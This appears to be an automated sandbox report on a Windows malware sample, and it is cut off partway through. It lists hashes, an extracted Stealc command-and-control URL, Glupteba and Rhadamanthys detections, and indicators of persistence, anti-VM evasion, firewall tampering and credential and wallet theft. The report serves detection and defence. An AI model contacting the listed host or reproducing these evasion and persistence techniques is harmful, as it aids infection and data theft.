Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 14:21
Static task
static1
General
-
Target
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe
-
Size
389KB
-
MD5
56ab49c031367376bc8753b8bc2388da
-
SHA1
16e1bdbeb0df52ce30481c374a45d4ccb98e1219
-
SHA256
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d
-
SHA512
4bb0e1fb041909ab685cf55017f4fad5981dfade35f181a5e436596941da75d61b4cde788e1d813fb4abee38373a50761d745f4329246c6a9c4a625971d7d8ff
-
SSDEEP
12288:fgkkZ8m4E3qYGJ95Cj5BtcCuPHzVvd/FLobUk:v08zyqtouVLsUk
Malware Config
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 16 IoCs
Processes:
resource yara_rule behavioral1/memory/4640-67-0x0000000002F20000-0x000000000380B000-memory.dmp family_glupteba behavioral1/memory/2980-68-0x0000000002F50000-0x000000000383B000-memory.dmp family_glupteba behavioral1/memory/2980-69-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/4640-83-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/1352-145-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/4640-413-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/2980-415-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/1352-491-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/4640-515-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/2980-517-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/4640-585-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/1352-605-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/2980-842-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/6048-893-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/6092-894-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba behavioral1/memory/6140-896-0x0000000000400000-0x0000000000ECD000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
aYoDWoALsh7fWmLZJgqz1ZSo.exedescription ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" aYoDWoALsh7fWmLZJgqz1ZSo.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid Process procid_target PID 5084 created 2512 5084 RegAsm.exe 42 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
aYoDWoALsh7fWmLZJgqz1ZSo.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aYoDWoALsh7fWmLZJgqz1ZSo.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid Process 178 5972 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid Process 5328 netsh.exe 5160 netsh.exe 4008 netsh.exe -
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
aYoDWoALsh7fWmLZJgqz1ZSo.exeInstall.exeInstall.exerundll32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aYoDWoALsh7fWmLZJgqz1ZSo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aYoDWoALsh7fWmLZJgqz1ZSo.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MaKDbFZoKxsMGQUEadkOBsmF.exeInstall.exeInstall.exeun4.0.exeJKEGDHCFCA.exeleAODjb.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation MaKDbFZoKxsMGQUEadkOBsmF.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation un4.0.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation JKEGDHCFCA.exe Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation leAODjb.exe -
Drops startup file 11 IoCs
Processes:
msbuild.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6C5vrw9HlmBbodwnSru7JCve.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nq6HrOPNQV3AaiTZ2ENszitk.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zdUBOSEBG9eSDmyFgN1uKQWG.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwi2TsGcdAGdwOcS1B3eh5H5.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rfMtcSilGcz9WSg5R9vEYI1Y.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\26ZY1zErGGTZoLBKBy5Lpa8v.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M67GjMBrsbsHZTc6qTnNvMHQ.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8iwRl3OdyFG6LeZYMrXZXLBc.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sb771El5hpTNkkzOaJIpPwPM.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QPMwbWVY1JbuAE8Mag8boWCx.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYaLwPfN6vuiz6R1FwtbMxQK.bat msbuild.exe -
Executes dropped EXE 33 IoCs
Processes:
MaKDbFZoKxsMGQUEadkOBsmF.exeO8M8v9erpd6p9TZ5cZU71Tag.exerfVcCs84JgkadF5csIFA6eOA.exePPShZLAKQ6L4xgy8fCGXP1YJ.exePBCfG3wrCyp60tNkAdjwRCEQ.exeLmaiU21tMWhBuhG73TdiEsIZ.exeun4.0.exeun4.1.exeaYoDWoALsh7fWmLZJgqz1ZSo.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeEwbpoERL2KXj9VGzo9QBTWpU.exeInstall.exeInstall.exeCP1pPdaYSdNNSuryt7kujhW8.exeInstall.exeO8M8v9erpd6p9TZ5cZU71Tag.exerfVcCs84JgkadF5csIFA6eOA.exeLmaiU21tMWhBuhG73TdiEsIZ.exeInstall.exeAssistant_108.0.5067.20_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.execsrss.exeJKEGDHCFCA.exeinjector.exewindefender.exewindefender.exeGYSQssI.exeleAODjb.exepid Process 832 MaKDbFZoKxsMGQUEadkOBsmF.exe 4640 O8M8v9erpd6p9TZ5cZU71Tag.exe 2980 rfVcCs84JgkadF5csIFA6eOA.exe 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 1464 PBCfG3wrCyp60tNkAdjwRCEQ.exe 1352 LmaiU21tMWhBuhG73TdiEsIZ.exe 856 un4.0.exe 4232 un4.1.exe 440 aYoDWoALsh7fWmLZJgqz1ZSo.exe 1880 Z1z6oEWmHWh3S9fVhayDhyvW.exe 2260 Z1z6oEWmHWh3S9fVhayDhyvW.exe 4424 Z1z6oEWmHWh3S9fVhayDhyvW.exe 3096 Z1z6oEWmHWh3S9fVhayDhyvW.exe 3940 Z1z6oEWmHWh3S9fVhayDhyvW.exe 456 EwbpoERL2KXj9VGzo9QBTWpU.exe 5036 Install.exe 4912 Install.exe 5760 CP1pPdaYSdNNSuryt7kujhW8.exe 5996 Install.exe 6048 O8M8v9erpd6p9TZ5cZU71Tag.exe 6092 rfVcCs84JgkadF5csIFA6eOA.exe 6140 LmaiU21tMWhBuhG73TdiEsIZ.exe 3536 Install.exe 4540 Assistant_108.0.5067.20_Setup.exe_sfx.exe 4136 assistant_installer.exe 4440 assistant_installer.exe 5544 csrss.exe 5620 JKEGDHCFCA.exe 5724 injector.exe 2464 windefender.exe 5296 windefender.exe 5616 GYSQssI.exe 5612 leAODjb.exe -
Loads dropped DLL 12 IoCs
Processes:
Z1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exeun4.0.exeassistant_installer.exeassistant_installer.exerundll32.exepid Process 1880 Z1z6oEWmHWh3S9fVhayDhyvW.exe 2260 Z1z6oEWmHWh3S9fVhayDhyvW.exe 4424 Z1z6oEWmHWh3S9fVhayDhyvW.exe 3096 Z1z6oEWmHWh3S9fVhayDhyvW.exe 3940 Z1z6oEWmHWh3S9fVhayDhyvW.exe 856 un4.0.exe 856 un4.0.exe 4136 assistant_installer.exe 4136 assistant_installer.exe 4440 assistant_installer.exe 4440 assistant_installer.exe 5972 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x00090000000231fb-198.dat themida behavioral1/memory/440-257-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-259-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-275-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-271-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-283-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-281-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-262-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida behavioral1/memory/440-504-0x00007FF6D3F30000-0x00007FF6D4991000-memory.dmp themida -
Processes:
resource yara_rule behavioral1/files/0x00080000000231ef-167.dat upx behavioral1/memory/4232-502-0x0000000000400000-0x0000000000930000-memory.dmp upx behavioral1/memory/4232-675-0x0000000000400000-0x0000000000930000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
rfVcCs84JgkadF5csIFA6eOA.exeLmaiU21tMWhBuhG73TdiEsIZ.exeO8M8v9erpd6p9TZ5cZU71Tag.execsrss.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" rfVcCs84JgkadF5csIFA6eOA.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" LmaiU21tMWhBuhG73TdiEsIZ.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" O8M8v9erpd6p9TZ5cZU71Tag.exe Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
aYoDWoALsh7fWmLZJgqz1ZSo.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aYoDWoALsh7fWmLZJgqz1ZSo.exe -
Drops Chrome extension 2 IoCs
Processes:
leAODjb.exedescription ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json leAODjb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json leAODjb.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
leAODjb.exedescription ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini leAODjb.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Z1z6oEWmHWh3S9fVhayDhyvW.exeZ1z6oEWmHWh3S9fVhayDhyvW.exedescription ioc Process File opened (read-only) \??\D: Z1z6oEWmHWh3S9fVhayDhyvW.exe File opened (read-only) \??\F: Z1z6oEWmHWh3S9fVhayDhyvW.exe File opened (read-only) \??\D: Z1z6oEWmHWh3S9fVhayDhyvW.exe File opened (read-only) \??\F: Z1z6oEWmHWh3S9fVhayDhyvW.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
Processes:
csrss.exedescription ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 46 IoCs
Processes:
leAODjb.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exepowershell.exepowershell.exepowershell.exeGYSQssI.exeaYoDWoALsh7fWmLZJgqz1ZSo.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 leAODjb.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E leAODjb.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 leAODjb.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E6E5AFC8E26F79D2A2EBCDC0BC547682 leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_97FAD8EBB31B0B74F135144564816C0E leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini GYSQssI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA leAODjb.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol aYoDWoALsh7fWmLZJgqz1ZSo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini aYoDWoALsh7fWmLZJgqz1ZSo.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI aYoDWoALsh7fWmLZJgqz1ZSo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 leAODjb.exe File opened for modification C:\Windows\System32\GroupPolicy aYoDWoALsh7fWmLZJgqz1ZSo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol GYSQssI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_E7BE3A16BEFC370B1A2E61CE6CF7E661 leAODjb.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 leAODjb.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
aYoDWoALsh7fWmLZJgqz1ZSo.exepid Process 440 aYoDWoALsh7fWmLZJgqz1ZSo.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exePPShZLAKQ6L4xgy8fCGXP1YJ.exedescription pid Process procid_target PID 4204 set thread context of 1512 4204 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe 87 PID 4912 set thread context of 5084 4912 PPShZLAKQ6L4xgy8fCGXP1YJ.exe 99 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
Processes:
O8M8v9erpd6p9TZ5cZU71Tag.exeLmaiU21tMWhBuhG73TdiEsIZ.exerfVcCs84JgkadF5csIFA6eOA.exedescription ioc Process File opened (read-only) \??\VBoxMiniRdrDN O8M8v9erpd6p9TZ5cZU71Tag.exe File opened (read-only) \??\VBoxMiniRdrDN LmaiU21tMWhBuhG73TdiEsIZ.exe File opened (read-only) \??\VBoxMiniRdrDN rfVcCs84JgkadF5csIFA6eOA.exe -
Drops file in Program Files directory 14 IoCs
Processes:
leAODjb.exedescription ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi leAODjb.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\NhgXboc.dll leAODjb.exe File created C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml leAODjb.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\gvVUloZ.dll leAODjb.exe File created C:\Program Files (x86)\gbPxNkbXHfUn\cqdpDDd.dll leAODjb.exe File created C:\Program Files (x86)\yvWovCiVU\amDviS.dll leAODjb.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak leAODjb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja leAODjb.exe File created C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml leAODjb.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi leAODjb.exe File created C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml leAODjb.exe File created C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml leAODjb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak leAODjb.exe File created C:\Program Files (x86)\LCifMpYymZWU2\ZadmzDkveihSi.dll leAODjb.exe -
Drops file in Windows directory 13 IoCs
Processes:
rfVcCs84JgkadF5csIFA6eOA.exeO8M8v9erpd6p9TZ5cZU71Tag.exeschtasks.execsrss.exeLmaiU21tMWhBuhG73TdiEsIZ.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc Process File opened for modification C:\Windows\rss rfVcCs84JgkadF5csIFA6eOA.exe File created C:\Windows\rss\csrss.exe rfVcCs84JgkadF5csIFA6eOA.exe File created C:\Windows\rss\csrss.exe O8M8v9erpd6p9TZ5cZU71Tag.exe File created C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss LmaiU21tMWhBuhG73TdiEsIZ.exe File created C:\Windows\rss\csrss.exe LmaiU21tMWhBuhG73TdiEsIZ.exe File opened for modification C:\Windows\rss O8M8v9erpd6p9TZ5cZU71Tag.exe File opened for modification C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job schtasks.exe File created C:\Windows\Tasks\mRaseIvrfxDtBOYKW.job schtasks.exe File created C:\Windows\Tasks\eGwAoTnpAObQfPU.job schtasks.exe File created C:\Windows\Tasks\FTXCzbcEvROqagNdd.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid Process 5448 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 1208 4912 WerFault.exe 95 4948 832 WerFault.exe 92 100 5084 WerFault.exe 99 4480 5084 WerFault.exe 99 4856 1464 WerFault.exe 98 5668 856 WerFault.exe 102 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
un4.0.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 un4.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString un4.0.exe -
Creates scheduled task(s) 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 5032 schtasks.exe 5532 schtasks.exe 1876 schtasks.exe 5548 schtasks.exe 3176 schtasks.exe 3776 schtasks.exe 5880 schtasks.exe 4064 schtasks.exe 2492 schtasks.exe 1028 schtasks.exe 5800 schtasks.exe 5468 schtasks.exe 2488 schtasks.exe 5648 schtasks.exe 5736 schtasks.exe 5396 schtasks.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
rundll32.exeInstall.exeInstall.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
LmaiU21tMWhBuhG73TdiEsIZ.exepowershell.exepowershell.exewindefender.exepowershell.exeO8M8v9erpd6p9TZ5cZU71Tag.exepowershell.exepowershell.exerfVcCs84JgkadF5csIFA6eOA.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" LmaiU21tMWhBuhG73TdiEsIZ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-891 = "Morocco Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local 